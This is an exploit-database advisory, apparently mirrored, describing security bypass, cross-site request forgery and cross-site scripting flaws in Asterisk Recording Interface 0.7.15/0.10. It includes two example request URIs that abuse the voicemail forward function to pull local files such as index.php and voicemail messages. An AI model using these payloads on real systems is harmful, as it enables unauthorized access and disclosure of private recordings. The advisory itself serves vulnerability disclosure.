Asterisk Recording Interface 0.7.15/0.10 – Multiple Vulnerabilities

• Exploit Database
• 19 阅读

• 作者： TurboBorland
  日期： 2010-07-12
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/34301/

• source: https://www.securityfocus.com/bid/41571/info
  
  The Asterisk Recording Interface is prone to the following issues:
  
  1. Multiple security bypass vulnerabilities.
  2. A cross-site request-forgery vulnerability.
  3. A cross-site scripting vulnerability.
  
  Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions. 
  
  The following example URIs are available:
  
  http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php
  
  http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt